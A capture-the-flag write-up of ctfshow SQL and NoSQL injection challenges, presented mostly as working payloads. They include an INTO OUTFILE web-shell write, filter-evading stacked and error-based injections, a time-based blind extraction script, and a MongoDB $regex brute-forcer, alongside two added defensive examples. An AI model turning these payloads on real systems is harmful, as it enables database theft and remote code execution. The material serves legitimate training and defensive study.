Download payload.bin from the group files and upload it; do not decompress it

C64File"');select 0x3c3f3d60245f4745545b315d603f3e into outfile '/var/www/html/1.php';--+

Finally, RCE.

web225

Method 1: handler

ctfshow';show tables;

Stacked injection

ctfshow';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

Method 2: prepared statements

api/?username=ctfshow';PREPARE huayang from concat('s','elect', ' database()');EXECUTE huayang;
api/?username=ctfshow';PREPARE huayang from concat('s','elect', " table_name  from information_schema.tables where table_schema='ctfshow_web'");EXECUTE huayang;
api/?username=ctfshow';PREPARE huayang from concat('s','elect', " column_name  from information_schema.columns where table_name='ctfshow_flagasa'");EXECUTE huayang;
api/?username=ctfshow';PREPARE huayang from concat('s','elect', " flagas from ctfshow_flagasa");EXECUTE huayang;

Of course, once the table name is known you can dump everything directly, without enumerating the columns first.

api/?username=ctfshow';PREPARE huayang from concat('s','elect', " * from ctfshow_flagasa");EXECUTE huayang;

You can also use char() for the bypass.

api/?username=ctfshow';PREPARE huayang from concat(char(115,101,108,101,99,116), ' database()');EXECUTE huayang;

web226

Still stacked injection.

Done in one step, much like the above, except that ) is filtered, so just convert the statement to hexadecimal.

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d2063746673685f6f775f666c61676173;EXECUTE huayang;

web227

In MySQL, information about stored procedures and functions is stored in information_schema

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e526f7574696e6573;EXECUTE huayang;

web228-230

The next few challenges continue with the web226 approach.

228

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d2063746673685f6f775f666c616761736161;EXECUTE huayang;

229

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d20666c6167;EXECUTE huayang;

230

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d20666c61676161626278;EXECUTE huayang;
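
Added example (not from the original post): the web225 to web230 payloads keep keywords such as select out of the raw request by assembling the statement with concat, char() or a hex literal, so a filter or log review has to rebuild the PREPARE text before matching. The sketch below does that for logged query strings; the KEYWORDS list and the function names are assumptions for illustration, and the samples are query strings taken from this page.

```python
import re
from urllib.parse import unquote_plus

# Keywords a request filter typically looks for (assumed list, for illustration).
KEYWORDS = ("select", "information_schema")

PREPARE = re.compile(r"prepare\s+\w+\s+from\s+(.*?);\s*execute", re.I | re.S)
# One token of the PREPARE expression: hex literal, char(...) call, or quoted string.
TOKEN = re.compile(
    r"0x(?P<hex>(?:[0-9a-f]{2})+)"
    r"|\bchar\((?P<char>\s*\d+(?:\s*,\s*\d+)*\s*)\)"
    r"|'(?P<sq>[^']*)'"
    r'|"(?P<dq>[^"]*)"',
    re.I,
)

def rebuild_prepared(request):
    """Return the statement text of every PREPARE ... FROM <expr> in a request."""
    statements = []
    for expr in PREPARE.findall(unquote_plus(request)):
        parts = []
        for m in TOKEN.finditer(expr):
            if m.group("hex"):
                parts.append(bytes.fromhex(m.group("hex")).decode("latin-1"))
            elif m.group("char"):
                parts.append("".join(chr(int(n)) for n in m.group("char").split(",")))
            else:
                parts.append(m.group("sq") if m.group("sq") is not None else m.group("dq"))
        statements.append("".join(parts))
    return statements

def hidden_keywords(request):
    """Keywords missing from the raw request but present in the rebuilt statement."""
    raw = unquote_plus(request).lower()
    rebuilt = " ".join(rebuild_prepared(request)).lower()
    return [k for k in KEYWORDS if k in rebuilt and k not in raw]

# Sample requests: the web225, web229 and web227 query strings from this page.
SAMPLES = [
    "username=ctfshow';PREPARE huayang from concat('s','elect', ' database()');EXECUTE huayang;",
    "username=ctfshow';PREPARE huayang from concat(char(115,101,108,101,99,116), ' database()');EXECUTE huayang;",
    "username=1';PREPARE huayang from 0x73656c656374202a2066726f6d20666c6167;EXECUTE huayang;",
    "username=1';PREPARE huayang from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e526f7574696e6573;EXECUTE huayang;",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(rebuild_prepared(sample), hidden_keywords(sample))
```

A non-empty result from hidden_keywords means the request carried SQL that a match on the raw text would not have seen.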

web231

UPDATE injection

I didn't know how to do this one; see y4tacker's and yq1ng's writeups.

Method 1: subquery

password=',username=(select yq1ng.a from (select group_concat(flagas)a from flaga) yq1ng) where username="user1";#

Method 2

password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1
password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga') where 1=1#&username=1
password=1',username=(select flagas from flaga) where 1=1#&username=1

web232

web233

I couldn't solve this one; here is Y4tacker's script.

"""
Author:Y4tacker
"""
import requests
url = "http://f23e96e7-5510-46dd-a866-52a312e2ccdb.chall.ctf.show/api/?page=1&limit=10"
result = ""
i = 0
while 1:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # query the database
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # query the table name
        # payload = "select column_name from information_schema.columns where table_name='flag233333' limit 1,1"
        # query the data
        payload = "select flagass233 from flag233333"
        data = {
            'username': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.05),1)#",
            'password': '4'
        }
        try:
            r = requests.post(url, data=data, timeout=0.9)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
        print(data)
    else:
        break
    print(result)
#1'%20or%20if(ascii(substr((select%20flagass233%20from%20flag233333),1,1))>101,sleep(5),1)%23%26limit=10
# username:1'%20or%20if(ascii(substr((select%20flagass233%20from%20flag233333),1,1))>101,sleep(1),1)%23
# password:4

Run it several times; the flag may come out wrong.

web244

Error-based injection

api/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),2)%23
api/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23
api/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),0x7e),1)%23
api/?id=1' and updatexml(1,concat(0x7e,(select flag from ctfshow_flag),0x7e),1)%23

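The output is cut off, so it has to be extracted in slices.

At most 31 characters can come out, while the flag is 42 characters.

Use left or right to take a slice.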

api/?id=1' and updatexml(1,concat(0x7e,(select right(flag,11) from ctfshow_flag),0x7e),1)%23

substr can also be used to take a slice.

api/?id=1' and updatexml(1,concat(0x7e,(select substr(flag,32,43) from ctfshow_flag),0x7e),1)%23

web245

Use extractvalue

api/?id=1' and (extractvalue(1,concat(0x7e,(select substr(flag1,1,31) from ctfshow_flagsa),0x7e)))%23
api/?id=1' and (extractvalue(1,concat(0x7e,(select substr(flag1,32,43) from ctfshow_flagsa),0x7e)))%23

web246

api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;%23
api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()limit 1,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;%23
api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='ctfshow_flags' limit 1,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;%23
api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select flag2 from ctfshow_flags),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;%23

web247

I couldn't get this one to work.

web249

NoSQL injection

api/?id[]=flag

web250

username[$gt]=1&password[$gt]=1

web251-252

username[$gt]=1&password[$gt]=1
username[$gt]=admin&password[$gt]=ctfshow666nnneeaaabbbcc

web253

Here is yq1ng's script; his regex used '^'.

The regex can also use the non-greedy .*?

# encoding:     utf-8
# @Author:      yq1ng
# @Date:        2020-11-29 15:20
# @challenges: web253
import requests
url = "http://aa891c9f-c9f4-4e84-8341-21aabe486b6e.chall.ctf.show/api/"
data = {"username[$regex]":"flag","password[$regex]":""}
s = requests.session()
def get_flag():
    flag = ""
    for x in range(1,43):
        for y in r'flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}':
            data["password[$regex]"] = ".*?"+flag+y
            s = requests.post(url, data = data)
            if "6210" in s.text:
                print(data)
                flag += y
                print(flag)
                break
if __name__ == '__main__':
    get_flag()

This can be used to work out the name and password.
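
Added example (not from the original post or the challenge source): in PHP, username[$gt]=1 arrives as an array, and passing it unchecked into a MongoDB filter turns user input into query operators, which is what the web250 to web253 payloads rely on. The sketch shows that parsing, a toy in-memory stand-in for the filter (equality, $gt and $regex only), and a login that accepts plain strings only; the collection, credentials and function names are constructed.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample collection; the credentials are made up for this example.
USERS = [{"username": "admin", "password": "constructed-secret"}]
OPS = {"$gt": lambda v, a: v > a,
       "$regex": lambda v, a: re.search(a, v) is not None}

def parse_php_form(body):
    """Parse a form body the way PHP fills $_POST: name[key]=v becomes an array."""
    params = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", name)
        if not m:
            params[name] = value
            continue
        slot = params.get(m.group(1))
        if not isinstance(slot, dict):
            slot = params[m.group(1)] = {}
        slot[m.group(2) or len(slot)] = value  # name[]=v appends at the next index
    return params

def matches(doc, query):
    """Toy stand-in for a MongoDB filter: equality, $gt and $regex only."""
    for field, cond in query.items():
        value = doc.get(field, "")
        if isinstance(cond, dict):
            if not all(op in OPS and OPS[op](value, arg) for op, arg in cond.items()):
                return False
        elif value != cond:
            return False
    return True

def vulnerable_login(body):
    """Passes request values straight into the filter, arrays included."""
    p = parse_php_form(body)
    query = {"username": p.get("username"), "password": p.get("password")}
    return [u for u in USERS if matches(u, query)]

def hardened_login(body):
    """Accepts only plain strings, so operator arrays never reach the filter."""
    p = parse_php_form(body)
    for field in ("username", "password"):
        if not isinstance(p.get(field), str):
            raise ValueError(f"{field} must be a plain string")
    return [u for u in USERS if matches(u, {f: p[f] for f in ("username", "password")})]
```

With the type check in place, the same request bodies raise ValueError instead of matching a user, and a $regex value is compared as a literal string rather than evaluated as a pattern.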

Time:2020.12.16

References:

https://yq1ng.github.io/z_post/CTFSHOW-WEB%E5%85%A5%E9%97%A8-Ttick%E6%80%BB%E7%BB%93/#more

https://y4tacker.blog.csdn.net/article/details/110144623

